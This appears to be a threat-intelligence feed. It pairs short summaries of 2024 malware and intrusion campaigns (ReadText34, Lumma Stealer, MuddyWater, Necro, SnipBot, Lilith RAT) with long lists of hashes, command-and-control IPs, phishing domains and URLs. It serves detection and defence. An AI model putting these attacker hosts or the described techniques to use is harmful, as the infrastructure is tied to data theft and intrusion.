869758de8334c2b201a07cfbfc0a903105a113080dde0355857de46b3eaae08e |
FileHash-SHA256 |
b2a2e8e0795b2f69d96a48a49985fb67d22d1c6e8b40dadd690c299b9af970d4 |
FileHash-SHA256 |
bd70882f67da03836f372172f655456ce19f95878d70ec39fcc6c059f9ef4ca0 |
FileHash-SHA256 |
bfbbba7d18be1aa2e85390fa69a761302756ee9348b7343af6f42f3b5d0a939c |
FileHash-SHA256 |
d9a8c4fc94655f47a127b45c71e426d0f2057b6faf78fb7b86ee2995f7def41d |
|
ReadText34 Ransomware Incident |
A ransomware attack was observed in September 2024, targeting an endpoint with limited visibility. The threat actor used stolen Administrator credentials to enable RDP and deploy malicious executables. They installed a vulnerable driver, TrueSight RogueKiller Antirootkit, to disable security applications. The ransomware, named ReadText34, utilized various techniques to disable system recovery and encrypt files. The attack involved the use of BianLian Go Trojan for command and control. File encryption was performed using the native Windows utility cipher.exe. A ransom note was left, threatening to release stolen data if not contacted within 72 hours. The incident highlights the importance of comprehensive endpoint monitoring, incident response planning, and attack surface reduction efforts. |
Type |
Indicator |
FileHash-MD5 |
891202963430a4b1dea2dc5b9af01dc5 |
FileHash-SHA1 |
f7042cd7c363eb85fbb9d4b42b667de4acbff24e |
FileHash-SHA256 |
8368925651fefcd85e0e73790082b9a69237fa66225f932c2a44014cc356acdc |
FileHash-SHA256 |
90daac69da7201e4e081b59b61ca2a2116772318621c430f75c91a65e56ea085 |
FileHash-SHA256 |
ac66828fbdf661d67562da5afb7cc8f55d9a8739ab1524e775d5dcebfc4de069 |
IPv4 |
94.198.50.195 |
email |
ithelp15@securitymy.name |
email |
ithelp15@yousheltered.com |
|
Uncovering ICICI Phishing Campaign: New Fraud App Found |
A malicious host mimicking ICICI Bank has been discovered, along with a fraudulent app disguised as ICICI Helpdesk. The phishing domain, cppcccare.com, is hosted on an ASN known for various malicious activities. The fraudulent app, named 'ICICI.apk', is detected as a Trojan Banker, Keylogger, and SMSspy. It's believed to have been operational since August 2024, with a falsely inflated download count of 500K+. The app's description matches other fraudulent apps, indicating a broader phishing campaign. The incident has been reported to the bank, hosting provider, and CERT-IN authorities. The article provides detailed technical information about the malicious domain and app, including file hashes and package details. |
Type |
Indicator |
FileHash-MD5 |
df1e45aa0435509d552602ca1b84ccb6 |
FileHash-SHA1 |
bde9068c2deb1e3dcf9b7646dc8960dbea97d8b3 |
FileHash-SHA256 |
cd89b4cc7dc155f30db39e31b30894ed11f3fb6ad0fe5b2d014b123e333084c6 |
IPv4 |
77.37.34.191 |
domain |
cppcccare.com |
|
Behind the CAPTCHA: A Clever Gateway of Malware |
A sophisticated infection chain dubbed ClickFix has been observed using fake CAPTCHA pages to distribute Lumma Stealer malware. The campaign targets multiple countries through two main vectors: cracked game download URLs and phishing emails impersonating GitHub. Users are tricked into executing malicious scripts copied to their clipboards, leading to malware installation. The attack employs multi-layered encryption and leverages mshta to bypass detection. Mitigation strategies include user education, robust email filtering, and keeping systems updated. The global reach and deceptive tactics highlight the evolving nature of cyber threats. |
Type |
Indicator |
FileHash-SHA256 |
b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624 |
FileHash-SHA256 |
cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54 |
FileHash-SHA256 |
632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c |
FileHash-SHA256 |
19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a |
FileHash-SHA256 |
d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207 |
FileHash-SHA256 |
bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55 |
FileHash-SHA256 |
fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511 |
|
Unmasking MuddyWater's Multiple RMM Software Attacks |
MuddyWater, a threat group active since 2017, has been utilizing various Remote Monitoring and Management (RMM) software for attacks, particularly in the Middle East. Their tactics include spear-phishing emails with malicious attachments or links, leading to the installation of RMM tools like Atera Agent, ScreenConnect, Remote Utilities, N-Able, Syncro, and SimpleHelp. These legitimate tools are exploited to gain remote access and control over victim systems. The group's attacks are characterized by Arabic-language lures, use of file-sharing services, and a consistent deployment process. MuddyWater's activities primarily target government, military, and energy sectors, demonstrating sophisticated evasion techniques and a large arsenal of attack tools. |
Type |
Indicator |
FileHash-MD5 |
04afff1465a223a806774104b652a4f0 |
FileHash-MD5 |
146cc3a1a68be349e70b79f9115c496b |
FileHash-MD5 |
1e9a4e774b61acc8a6b35ee50417e661 |
FileHash-MD5 |
1f0b9aed4b2c8d958a9b396852a62c9d |
FileHash-MD5 |
23d99f912f2491749b89e4fd337273bc |
FileHash-MD5 |
242098c3e87822bffa7c337987065fbe |
FileHash-MD5 |
244a4f81cff4a8dc5872628a40713735 |
FileHash-MD5 |
24c72ffef74be81c5a7d4cb024110328 |
FileHash-MD5 |
2cd569dafe4f537150f0416b021c30ab |
FileHash-MD5 |
387fd14f5a89ec121c4c2c989063822f |
FileHash-MD5 |
3c1b429685e5f1853a3cd955bd0acbd7 |
FileHash-MD5 |
4055d8b5c2e909f5db8b75a5750a7005 |
FileHash-MD5 |
473dfccda44f85d119aadefb92cd085e |
FileHash-MD5 |
5d013b96a25f0610cd1ac45d61d44d7e |
FileHash-MD5 |
5d61614099d6d567441d15c58d6517b0 |
FileHash-MD5 |
64fc017a451ef273dcacdf6c099031f3 |
FileHash-MD5 |
66fddebf896a5631172436b740c06ad1 |
FileHash-MD5 |
6bc591f4e8eb1ea54b4d6defd019bee8 |
FileHash-MD5 |
71ffc9ebbb80f4e2f405034662dfd424 |
FileHash-MD5 |
7aeb1fe9ab3efffcf390eadaff696411 |
FileHash-MD5 |
7ce27d43bdbb6c9238c5d367a86dc37b |
FileHash-MD5 |
7ed44b36850a5f192fb56768669d8090 |
FileHash-MD5 |
809334c0b55009c5a50f37e4eec63c43 |
FileHash-MD5 |
83044ce990501559e34f5a64318778a8 |
FileHash-MD5 |
8b50f74907810cf23507b5bd8d83f13c |
FileHash-MD5 |
8d2199fa11c6a8d95c1c2b4add70373a |
FileHash-MD5 |
8e5ba70473c66334ced67ac3be9970e0 |
FileHash-MD5 |
93be13bbcad30440a0d0ef3868d67003 |
FileHash-MD5 |
960594cbdf938bcb03bd0637843d9154 |
FileHash-MD5 |
a2571577f281eda9548d9047b37cbbb8 |
FileHash-MD5 |
a85460ff7d12ccc2b82da8143ac1f594 |
FileHash-MD5 |
a8fce1e8e89053e143b5431cfa5209cb |
FileHash-MD5 |
aaa9db79b5d6ba319e24e6180a7935d6 |
FileHash-MD5 |
aba760ec55fdeccb35adb068443feb89 |
FileHash-MD5 |
ad4ce3a58db27f40e17abf633e319efe |
FileHash-MD5 |
b181ecbb7394e3b1394a8c97af65b7e2 |
FileHash-MD5 |
b9cff91be734e2a071d3b0fc07dc8386 |
FileHash-MD5 |
c381c2cb8fdd6acf1636280b9424f573 |
FileHash-MD5 |
c4a88707bba871a667004a4a27de6785 |
FileHash-MD5 |
c5a737a346e0a83082b924712926af7d |
FileHash-MD5 |
c67d578a14571e4f56430ce4bdc228f9 |
FileHash-MD5 |
cdeb7abfc7775c63745135431272dda3 |
FileHash-MD5 |
d16bb327c655ac5e52c9452cedb369da |
FileHash-MD5 |
d1b4ca2933f49494b4400d5bf5ab502e |
FileHash-MD5 |
dd247ccd7cc3a13e1c72bb01cf3a816d |
FileHash-MD5 |
de578308ac3403ae9e88616b8a292383 |
FileHash-MD5 |
e8e84ac1ae83a45c260df146e97cb1cb |
FileHash-MD5 |
e8f3ecc0456fcbbb029b1c27dc1faad0 |
FileHash-MD5 |
eb0bba584138044e2d051deab69a57f1 |
FileHash-MD5 |
ef6ec560efd05d21976a6fd3f489e206 |
FileHash-MD5 |
f1c935ce028022ab2a495eae83adacc6 |
FileHash-MD5 |
fa55d4fe55eb4b9b34804d94bcd2f88f |
FileHash-MD5 |
fa6d5164772ba72dc3931dae8e09b488 |
FileHash-SHA1 |
03188d5ee44005b1b0e2ed62c943cd8571ab8ee2 |
FileHash-SHA1 |
0467a0dd4f9e92d54e3d059aed49f282f2ccf40e |
FileHash-SHA1 |
09a73164c70426372b431cba80510037eb42feb9 |
FileHash-SHA1 |
0f5c2ebbf2edc7d25ea72437b5f5b2245fcffacf |
FileHash-SHA1 |
0fc0e1ab30f55d1709532496ac6adac107a4729e |
FileHash-SHA1 |
116646a11967c1eed0e6072150b8d581bcf8d6a5 |
FileHash-SHA1 |
11b14763023772cc2eebfa306aef0c9e946b491b |
FileHash-SHA1 |
18a6ee322f30fe17f896686fbc162e4c8d628e5a |
FileHash-SHA1 |
1dd0301a120d6cbed1d22b9d1fb8c9d3d6793546 |
FileHash-SHA1 |
21966155675a407ba199561cf245e9e2858026bf |
FileHash-SHA1 |
2319cbf50ff858b66aa36b27a78ac7ef89a6d17a |
FileHash-SHA1 |
24b60847bc0712c9ba0b8036c59ee16c211fa8bb |
FileHash-SHA1 |
2f7056621e1a8ecb20a7639635d403e2c44e6135 |
FileHash-SHA1 |
3cf40758a15faf5037a7fcb6c8d6c322ec54dfc1 |
FileHash-SHA1 |
3e6f2c6ef018528dc65b97331f3ce745b3c386a0 |
FileHash-SHA1 |
41f2e6fe3a26cfad586fa4c7682d0a815567a1a4 |
FileHash-SHA1 |
4d26a7a2a3b6900050dba6058b2797bfa1ce1102 |
FileHash-SHA1 |
53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640 |
FileHash-SHA1 |
69f68529e07f2463eb105cfc87df04539e969a56 |
FileHash-SHA1 |
6aa8b4f4a6fd1b4f768b1ac6faaaddbaa302a585 |
FileHash-SHA1 |
6fb8b0e4e31f678f53b22e7b8a1b70f0deef1545 |
FileHash-SHA1 |
707c251833db0fb7c17c79413ddaebcb54cdb0fc |
FileHash-SHA1 |
71093d587278185fd831783acb2a97444ad661d8 |
FileHash-SHA1 |
77430cca36ee983dc17ca47efe9faa608effcef8 |
FileHash-SHA1 |
7918e2c9c6f2847078bb736968f8f21b7e70a0af |
FileHash-SHA1 |
8103cbffd4f7651c32a1cc602f0398027fb3207f |
FileHash-SHA1 |
81c06183b1bb146f5f1a5f1d03ac44fa9d68d341 |
FileHash-SHA1 |
81caea574f890dd6d25a95d04ae6e2d4ff7222d7 |
FileHash-SHA1 |
94feda1c4059291a7e00fbe5435291017caf55fc |
FileHash-SHA1 |
9543cab61c330e533bcdd92ed6e1012f1b284d10 |
FileHash-SHA1 |
a65d4b46ba7fcb3b023f61303e65f0c494b63386 |
FileHash-SHA1 |
a76b7579c217ce45f9c257b4a3617cfcd63c3212 |
FileHash-SHA1 |
b7522d2f1fb7b9b92348b4d88c62480683d3485c |
FileHash-SHA1 |
b9a0277465cc427191942fb0e9ae76c83ba84d3e |
FileHash-SHA1 |
bb8647eeaf1acadbb2aa7d67222d4ab8054ac645 |
FileHash-SHA1 |
bdc8c0a03b3430af66895b5c6f03da00916447ca |
FileHash-SHA1 |
c4f00531020b8f7cc865fe26c6e31e358e666831 |
FileHash-SHA1 |
c58370b4114d4d493e141a66cd1484573ccf02b5 |
FileHash-SHA1 |
cc7afffdb88729a5e977fa8f75a898d09624f54a |
FileHash-SHA1 |
cf8ad0da6dc45ae7ce87f792b1e60175cefc2b50 |
FileHash-SHA1 |
d005ebee72feb5ac50ee81e872665cae32d6c1c9 |
FileHash-SHA1 |
dfe1f455adf8a98d94c7217acc763770ada4b4af |
FileHash-SHA1 |
f228e772a31b4fc160cb59cf5627224613f10941 |
FileHash-SHA1 |
ff69b5e96a83f4f5657a087649882ec8b5ba09d2 |
FileHash-SHA256 |
0187db1c61f146d49f74fb7db1dccec1e42ad7d431bffbfcaeec910af1a4bc68 |
FileHash-SHA256 |
09e09503962a2a8022859e72b86ad8c69dcbf79839b71897c0bf8a4c4b9f4dd6 |
FileHash-SHA256 |
14c270cf53a50867e42120250abca863675d37abf39d60689e58288a9e870144 |
FileHash-SHA256 |
165a80f6856487b3b4f41225ac60eed99c3d603f5a35febab8235757a273d1fd |
FileHash-SHA256 |
2722e289767ae391e3c3773b8640a8b9f6eb24c6a9d6e541f29c8765f7a8944b |
FileHash-SHA256 |
28fadc26a2bee907fbdbf1aaebac6c7e6f8aa95e8c312cd659d19b82d1dfa70e |
FileHash-SHA256 |
2ae6c5c2b71361f71ded4ad90bbf6ef0b0f4778caf54078c928e2017302fbe69 |
FileHash-SHA256 |
31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535 |
FileHash-SHA256 |
39da7cc7c627ea4c46f75bcec79e5669236e6b43657dcad099e1b9214527670e |
FileHash-SHA256 |
3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b |
FileHash-SHA256 |
3f9db7bf1c9d897d46f669854e7ecc945778024f04cac9cd1585140d0d73a34f |
FileHash-SHA256 |
4b41b605ffc0e31bd9d460d5a296ac6e8cfd56a215dc131e90ec2654f0ffe31b |
FileHash-SHA256 |
4f839eac8204930ecc21a35476069daabbd40c14ef5af4db0e66de9b6a2e62fb |
FileHash-SHA256 |
5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b |
FileHash-SHA256 |
5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990dd |
FileHash-SHA256 |
638c7a4f833dc95dbab5f0a81ef03b7d83704e30b5cdc630702475cc9fff86a2 |
FileHash-SHA256 |
65667d0b1710636d4b2030a25f64d0f960d75ebfc3f5ad92f03f78293b47ed75 |
FileHash-SHA256 |
70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b |
FileHash-SHA256 |
77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1 |
FileHash-SHA256 |
7e6a5e32596b99f45ea9099a14507a82c10a460c56585499d7cd640f2625567f |
FileHash-SHA256 |
7e7292b5029882602fe31f15e25b5c59e01277abaab86b29843ded4aa0dcbdd1 |
FileHash-SHA256 |
85103955e35a1355ce68a92eaedd8f9376de1927d95bf12657b348dea6a8077b |
FileHash-SHA256 |
887c09e24923258e2e2c28f369fba3e44e52ce8a603fa3aee8c3fb0f1ca660e1 |
FileHash-SHA256 |
8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212f |
FileHash-SHA256 |
9a33655007a4fddf9c434d84fafe205479aaa3f5eaf7425e14beb83e46fa7041 |
FileHash-SHA256 |
9a785f508890d250ab9e3a43f974a89f3311ebd0e85ec98b46c76bdb7bef7cfb |
FileHash-SHA256 |
9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27 |
FileHash-SHA256 |
a6b1de8184a7e560cea461b0e05d4136d0068b35c12c0889c4036d177e331a83 |
FileHash-SHA256 |
b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf |
FileHash-SHA256 |
bab601635aafeae5fbfe1c1f7204de17b189b345efd91c46001f6d83efbb3c5a |
FileHash-SHA256 |
c6128f222f844e699760e32695d405bd5931635ec38ae50eddc17a0976ccefb4 |
FileHash-SHA256 |
cc8be1d525853403f6cfabcf0fc3bd0ca398ece559388102a7fc55e9f3aa9b33 |
FileHash-SHA256 |
d550f0f9c4554e63b6e6d0a95a20a16abe44fa6f0de62b6615b5fdcdb82fe8e1 |
FileHash-SHA256 |
d65d80ab0ccdc7ff0a72e71104de2b4c289c02348816dce9996ba3e2a4c1dd62 |
FileHash-SHA256 |
dd2675e2f6835f8a8a0e65e9dbc763ca9229b55af7d212da38b949051ae296a5 |
FileHash-SHA256 |
dedc593acc72c352feef4cc2b051001bfe22a79a3a7852f0daf95e2d10e58b84 |
FileHash-SHA256 |
ec553e14b84ccca9b84e96a9ed19188a1ba5f4bf1ca278ab88f928f0b00b9bd0 |
FileHash-SHA256 |
f17f6866f4748e6e762752062acdf983d3b083371db83503686b91512b9bcae3 |
FileHash-SHA256 |
f511bdd471096fc81dc8dad6806624a73837710f99b76b69c6501cb90e37c311 |
FileHash-SHA256 |
f664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376 |
FileHash-SHA256 |
f865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393 |
FileHash-SHA256 |
fb02e97d52a00fca1580ca71ed152dd28dd5ae28ab0a9c8e7b32cebd7f1998a1 |
FileHash-SHA256 |
ff2ae62ba88e7068fa142bbe67d7b9398e8ae737a43cf36ace1fcf809776c909 |
FileHash-SHA256 |
ffbe988fd797cbb9a1eedb705cf00ebc8277cdbd9a21b6efb40a8bc22c7a43f0 |
IPv4 |
146.70.149.61 |
IPv4 |
178.32.30.3 |
IPv4 |
193.109.120.59 |
IPv4 |
51.254.25.36 |
IPv4 |
51.255.19.178 |
|
Necro Trojan infiltrates Google Play and Spotify and WhatsApp mods |
A new version of the Necro Trojan has infected various popular applications, including game mods and apps on Google Play, potentially affecting over 11 million Android devices. The multi-stage loader uses steganography to hide payloads and obfuscation to evade detection. Its modular architecture allows for targeted delivery of updates or new malicious modules. The Trojan can display ads, download and execute arbitrary files, install applications, open links in invisible windows, run tunnels through victim devices, and potentially subscribe to paid services. Infected apps include Wuta Camera, Max Browser, and modified versions of Spotify, WhatsApp, and games like Minecraft. |
Type |
Indicator |
IPv4 |
47.88.3.73 |
FileHash-MD5 |
0898d1a6232699c7ee03dd5e58727ede |
FileHash-MD5 |
1590d5d62a4d97f0b12b5899b9147aea |
FileHash-MD5 |
1cab7668817f6401eb094a6c8488a90c |
FileHash-MD5 |
1eaf43be379927e050126e5a7287eb98 |
FileHash-MD5 |
247a0c5ca630b960d51e4524efb16051 |
FileHash-MD5 |
28b8d997d268588125a1be32c91e2b92 |
FileHash-MD5 |
30d69aae0bdda56d426759125a59ec23 |
FileHash-MD5 |
36ab434c54cce25d301f2a6f55241205 |
FileHash-MD5 |
37404ff6ac229486a1de4b526dd9d9b6 |
FileHash-MD5 |
4c2bdfcc0791080d51ca82630213444d |
FileHash-MD5 |
4e9bf3e8173a6f3301ae97a3b728f6f1 |
FileHash-MD5 |
522d2e2adedc3eb11eb9c4b864ca0c7f |
FileHash-MD5 |
52a2841c95cfc26887c5c06a29304c84 |
FileHash-MD5 |
59b44645181f4f0d008c3d6520a9f6f3 |
FileHash-MD5 |
874418d3d1a761875ebc0f60f9573746 |
FileHash-MD5 |
acb7a06803e6de85986ac49e9c9f69f1 |
FileHash-MD5 |
b3ba3749237793d2c06eaaf5263533f2 |
FileHash-MD5 |
b69a83a7857e57ba521b1499a0132336 |
FileHash-MD5 |
ccde06a19ef586e0124b120db9bf802e |
FileHash-MD5 |
ed6c6924201bc779d45f35ccf2e463bb |
FileHash-MD5 |
f338384c5b4bc7d55681a3532273b4eb |
FileHash-MD5 |
fa217ca023cda4f063399107f20bd123 |
FileHash-SHA1 |
7d1a369050b3bcb2274ee3580c08d1dc36afff13 |
FileHash-SHA256 |
2001dcbde6310fd03413d7936475d50e8bbafc6bd3c62ae637af2039cb74fff1 |
IPv4 |
47.88.190.200 |
IPv4 |
47.88.245.162 |
IPv4 |
47.88.246.111 |
hostname |
hsa.govsred.buzz |
|
Inside SnipBot: The Latest RomCom Malware Variant |
A novel version of the RomCom malware family called SnipBot has been discovered, revealing post-infection activity from attackers on victim systems. This new strain employs new tricks and unique code obfuscation methods beyond those seen in previous RomCom versions. The infection chain begins with a downloader disguised as a PDF, followed by multiple stages including DLLs injected into explorer.exe. SnipBot provides backdoor capabilities allowing command execution, file exfiltration, and additional payload downloads. Analysis of attacker post-infection activity shows attempts to gather network information, exfiltrate files, and explore Active Directory. The malware authors appear experienced but not elite, with some minor code flaws present. SnipBot has evolved from earlier RomCom versions, with samples dating back to December 2023. |
Type |
Indicator |
IPv4 |
23.137.249.182 |
IPv4 |
23.184.48.90 |
FileHash-MD5 |
7f2e4a44445b977ef8917cc0fb79035b |
FileHash-MD5 |
c0e499402acb6c302228b4a7923d5db6 |
FileHash-SHA1 |
983332a5660ec6c28123e745023b41105775ab6f |
FileHash-SHA1 |
cb3d3a7e39e7cdc8501ae0eff77d02a1c995bc31 |
FileHash-SHA256 |
0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501 |
FileHash-SHA256 |
1cb4ff70f69c988196052eaacf438b1d453bbfb08392e1db3df97c82ed35c154 |
FileHash-SHA256 |
2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4 |
FileHash-SHA256 |
5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129 |
FileHash-SHA256 |
57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312 |
FileHash-SHA256 |
5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118 |
FileHash-SHA256 |
5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8 |
FileHash-SHA256 |
60d96087c35dadca805b9f0ad1e53b414bcd3341d25d36e0190f1b2bbfd66315 |
FileHash-SHA256 |
92c8b63b2dd31cf3ac6512f0da60dabd0ce179023ab68b8838e7dc16ef7e363d |
FileHash-SHA256 |
a2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436 |
FileHash-SHA256 |
b9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045 |
FileHash-SHA256 |
cfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317 |
FileHash-SHA256 |
e5812860a92edca97a2a04a3151d1247c066ed29ae6bbcf327d713fbad7e79e8 |
FileHash-SHA256 |
f74ebf0506dc3aebc9ba6ca1e7460d9d84543d7dadb5e9912b86b843e8a5b671 |
IPv4 |
185.225.74.94 |
IPv4 |
212.46.38.222 |
IPv4 |
23.137.248.220 |
IPv4 |
23.137.249.14 |
IPv4 |
38.180.5.251 |
IPv4 |
79.141.170.34 |
IPv4 |
91.92.242.87 |
IPv4 |
91.92.250.104 |
IPv4 |
91.92.250.106 |
IPv4 |
91.92.250.240 |
IPv4 |
91.92.254.234 |
IPv4 |
91.92.254.54 |
domain |
cloudcreative.digital |
domain |
dns-msn.com |
domain |
drvmcprotect.com |
domain |
fastshare.click |
domain |
ilogicflow.com |
domain |
mcprotect.cloud |
domain |
publicshare.link |
domain |
sitepanel.top |
hostname |
1drv.fileshare.direct |
hostname |
adobe.cloudcreative.digital |
|
From initial compromise to ransomware and wipers |
The Twelve group, formed in April 2023 amid the Russian-Ukrainian conflict, specializes in attacking Russian government organizations. Their attacks involve encrypting and deleting victims' data, causing maximum damage without seeking financial gain. The group uses publicly available tools like Cobalt Strike, mimikatz, and PowerShell scripts for initial access, lateral movement, and privilege escalation. They employ LockBit 3.0 ransomware and Shamoon-based wipers to destroy infrastructures. Twelve exfiltrates sensitive data and posts it on Telegram. The group shares infrastructure with DARKSTAR, suggesting a possible syndicate. Their primary objectives are to destroy critical assets, disrupt business, steal sensitive data, and discredit victims. |
Type |
Indicator |
IPv4 |
5.8.16.148 |
IPv4 |
5.8.16.169 |
IPv4 |
212.109.217.88 |
IPv4 |
79.137.69.34 |
IPv4 |
89.238.132.68 |
IPv4 |
89.33.8.198 |
IPv4 |
91.90.121.220 |
CVE |
CVE-2021-21972 |
CVE |
CVE-2021-22005 |
FileHash-MD5 |
05d80c987737e509ba8e6c086df95f7d |
FileHash-MD5 |
31014add3cb96eee557964784bcf8fde |
FileHash-MD5 |
39b91f5dfbbec13a3ec7cce670cf69ad |
FileHash-MD5 |
43b3520d69dea9b0a27cce43c1608cad |
FileHash-MD5 |
48b2e5c49f121d257b35ba599a6cd350 |
FileHash-MD5 |
4bff90a6f7bafc8e719e8cab87ab1766 |
FileHash-MD5 |
5c46f361090620bfdcac6afce1150fae |
FileHash-MD5 |
5dcd02bda663342b5ddea2187190c425 |
FileHash-MD5 |
646a228c774409c285c256a8faa49bde |
FileHash-MD5 |
72830102884c5ebccf2afbd8d9a9ed5d |
FileHash-MD5 |
7a7c0a521b7596318c7cd86582937d98 |
FileHash-MD5 |
7bec3c59d412f6f394a290f95975e21f |
FileHash-MD5 |
7dfa50490afe4553fa6889bdafda7da2 |
FileHash-MD5 |
97aac7a2f0d2f4bdfcb0e8827a111524 |
FileHash-MD5 |
9bd78bcf75b9011f9d7a9a6e5aee5bf6 |
FileHash-MD5 |
9c74401a28bd71a87cdf5c17ad1dffa5 |
FileHash-MD5 |
d813f5d37ab2feed9d6a2b7d4d5b0461 |
FileHash-MD5 |
dad076c784d9fcbc506c1e614aa27f1c |
FileHash-MD5 |
e930b05efe23891d19bc354a4209be3e |
FileHash-MD5 |
ecb14e506727ee67220e87ced2e6781a |
FileHash-MD5 |
f8da1f02aa64e844770e447709cdf679 |
FileHash-MD5 |
f90e95b9fcab4c1b08ca06bc2c2d6e40 |
FileHash-SHA1 |
12df98ea1706186be41d8a9f7067bfc7ae0b1fba |
FileHash-SHA1 |
3fb65bff6f6d49eb46e2699d567fcabd241074a2 |
FileHash-SHA1 |
4991ae0805909b777d554e9521b45760492a5d7d |
FileHash-SHA1 |
d1f7832035c3e8a73cc78afd28cfd7f4cece6d20 |
FileHash-SHA256 |
4a4c8d32038388f6ca9475fb6db8024acd56a01721d53104c755f918fb31f221 |
FileHash-SHA256 |
773f9b531c8d59a32aad6f7f50e4a22c6e5642d4e70eed0a12390caf66eb8403 |
FileHash-SHA256 |
92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50 |
FileHash-SHA256 |
a028fe94a83846666ec974858398dbdcfd6fdd29bd995619a1f2542f611d62d6 |
IPv4 |
109.205.56.229 |
IPv4 |
193.110.79.47 |
IPv4 |
195.2.79.195 |
IPv4 |
217.148.143.196 |
IPv4 |
5.8.16.147 |
IPv4 |
5.8.16.149 |
IPv4 |
5.8.16.170 |
IPv4 |
5.8.16.236 |
IPv4 |
5.8.16.238 |
|
Threat Tracking: Analysis of Lilith RAT ported to AutoIt Script |
In April 2024, S2W's Threat Research and Intelligence Center TALON analyzed a malicious LNK file disguised as a list of tax evasion explanatory documents. The LNK file executed a PowerShell command to download and run an AutoIt script-based Lilith RAT malware from an attacker's server, which establishes a reverse shell on the infected system. Similarities between this campaign and KONNI group's tactics, such as command obfuscation and the use of AutoIt-ported malware, suggest the threat actor behind this attack could be linked to KONNI. |
Type |
Indicator |
FileHash-MD5 |
19dc387bffdc0a22f640bd38af320db4 |
FileHash-MD5 |
3334d2605c0df26536058f73a43cb074 |
FileHash-MD5 |
3c81dc763a4f003ba6e33cd5b63068cd |
FileHash-MD5 |
4f865db4192afb5bbcdeb2e899ca97a4 |
FileHash-MD5 |
5613ba2032bc1528991b583e17bad59a |
FileHash-MD5 |
6d6433c328f6cdce4a80efce3a29ea3e |
FileHash-MD5 |
6f5e4b45ca0d8c1128d27a15421eea38 |
FileHash-MD5 |
7bb236041b91d4cd4fa129267cf109c3 |
FileHash-MD5 |
9d6c79c0b395cceb83662aa3f7ed0123 |
FileHash-MD5 |
a0483db3725f8a50078daee7fd10f9bb |
FileHash-MD5 |
c56b5f0201a3b3de53e561fe76912bfd |
FileHash-MD5 |
d357fc478765a22f403c699a812f29bd |
FileHash-MD5 |
d5809e5f848f228634aa45ffe4a5ece0 |
FileHash-SHA1 |
1a8d8aa268d0475408f8a10c96d4cfee5e122011 |
FileHash-SHA1 |
2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
FileHash-SHA1 |
5ca50ceacfb31cbb04d6820e4021d911fcd8a60b |
FileHash-SHA256 |
0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed |
FileHash-SHA256 |
2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e |
FileHash-SHA256 |
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
FileHash-SHA256 |
5bcfb56c4c884e3657bbfeacca37853113d640b77dff9af519c08c4b64ca029d |
FileHash-SHA256 |
5ea09247ad85915a8d1066d1825061cc8348e14c4e060e1eba840d5e56ab3e4d |
FileHash-SHA256 |
778e46f8f3641a92d34da68dffc168fdc936841c5ad3d8b44da62a7b2dfe2ee1 |
FileHash-SHA256 |
77d05cc623f860ca2e6d47cdafc517aa0612de88291de7f2a3d95c5d04f1658a |
FileHash-SHA256 |
7c08b9178c05ab765a3d7754ac99f4ba1abddb226dbb6cc898bc692bba1898a1 |
FileHash-SHA256 |
808425bc599cd60989c90978d179af1d4c72dd7abfe5e0518aca44b48af15725 |
FileHash-SHA256 |
9e1a3653029b5378736ea1debba44cd81988de73b6d8689f9eba792e719da79a |
FileHash-SHA256 |
ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015 |
FileHash-SHA256 |
c2cc785857c64fa1f8fbb2e359a2638f187cd77cd29ca6701e38d750e822faa4 |
FileHash-SHA256 |
e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810 |
URL |
http://185.231.154.22:52720 |
URL |
http://62.113.118.157:57860 |
URL |
http://93.183.93.185:57860 |
domain |
bgfile.com |
domain |
downwarding.com |
domain |
jethropc.com |
domain |
mq734121.info |
domain |
oryzanine.com |
domain |
phasechangesolutions.com |
domain |
radionaranjalstereo.com |
domain |
serviceset.net |
domain |
sibbss.com |
domain |
storkse.com |
domain |
ttzcloud.com |
domain |
werxtracts.com |
hostname |
file.drive002.com |
hostname |
www.cammirando.com |
|
From the Depths: Analyzing the Cthulhu Stealer Malware for macOS |
